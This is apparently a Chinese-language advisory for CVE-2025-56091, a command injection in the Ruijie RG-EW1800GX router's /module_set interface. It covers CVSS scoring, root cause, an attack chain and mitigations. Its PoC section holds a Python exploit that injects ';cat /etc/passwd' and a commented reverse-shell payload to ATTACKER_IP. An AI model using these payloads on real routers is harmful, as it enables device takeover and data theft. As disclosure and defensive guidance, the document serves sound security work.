CVE-2025-56091 | Ruijie RG-EW1800GX 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56091

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-EW1800GX (B11P226_EW1800GX_10223121)

漏洞概述

CVE-2025-56091是锐捷网络（Ruijie）RG-EW1800GX路由器中存在的一个高危安全漏洞，CVSS评分达到8.8分。该漏洞属于操作系统命令注入（OS Command Injection）类型，存在于设备的Web管理接口中。攻击者可以通过向设备发送精心构造的POST请求，利用/module_set接口实现任意系统命令执行。漏洞存在于文件/usr/local/lua/dev_config/config_retain.lua中，由于缺乏对用户输入的有效过滤和验证，攻击者可以在请求参数中注入恶意命令字符，从而在目标设备上以较高权限执行任意操作系统命令。此漏洞不需要高级权限即可利用（PR:L），攻击复杂度较低（AC:L），且无需用户交互（UI:N），这使得漏洞极易被利用。成功利用此漏洞可导致设备完全沦陷，攻击者可以窃取敏感信息、植入后门或进一步渗透内网。

技术细节

该漏洞存在于Ruijie RG-EW1800GX路由器的Lua Web应用程序中，具体位于/usr/local/lua/dev_config/config_retain.lua文件的module_set功能模块。漏洞产生的根本原因是应用程序在处理用户输入时，直接将输入参数拼接到系统命令中执行，而未进行适当的安全过滤或使用安全的API（如popen、system的安全调用方式）。攻击者可以通过构造包含命令分隔符（如;、|、&&等）和恶意命令的POST请求来触发漏洞。攻击请求的目标端点为/module_set，攻击者可以在请求参数中注入如;cat /etc/passwd等命令来读取系统敏感文件，或注入更复杂的payload实现远程代码执行。由于设备通常以root或高权限运行Web服务，攻击成功后攻击者将获得设备的完全控制权。该漏洞影响设备的Web管理功能，攻击者需要能够访问设备的Web管理界面（通常为LAN侧，但部分配置不当的设备可能暴露到WAN侧）。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标设备为Ruijie RG-EW1800GX路由器，确定Web管理接口地址

STEP 2

步骤2

访问漏洞接口：攻击者访问/module_set接口，该接口存在于/usr/local/lua/dev_config/config_retain.lua中

STEP 3

步骤3

构造恶意请求：攻击者构造包含命令注入payload的POST请求，利用;、|等命令分隔符注入恶意命令

STEP 4

步骤4

命令执行：服务器将用户输入拼接到系统命令中执行，攻击者的恶意命令以高权限在设备上运行

STEP 5

步骤5

持久化控制：攻击者可植入后门、创建管理员账户或窃取敏感数据，实现对设备的持久控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-56091 PoC - Ruijie RG-EW1800GX Command Injection
# Target: Ruijie RG-EW1800GX B11P226_EW1800GX_10223121
# Vulnerability: OS Command Injection in /usr/local/lua/dev_config/config_retain.lua

target_ip = "192.168.1.1"  # Replace with target device IP
target_url = f"http://{target_ip}/cgi-bin/luci/api/module_set"

# Payload to read /etc/passwd - injects command via module_set parameter
payload = ";cat /etc/passwd;#"

# Alternative payload for reverse shell:
# payload = ";bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1;#"

data = {
    "module": "wifi_config",
    "action": "set",
    "config": payload
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

Ruijie RG-EW1800GX B11P226_EW1800GX_10223121

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议采取以下临时缓解措施：1）将设备Web管理界面设置为仅允许本地访问，禁用WAN侧管理功能；2）在网络边界设备上实施访问控制，限制对设备管理端口（80/443）的访问；3）监控设备日志，关注异常的POST请求和命令执行行为；4）考虑使用VPN等安全通道访问设备管理界面，避免将管理接口直接暴露在网络中。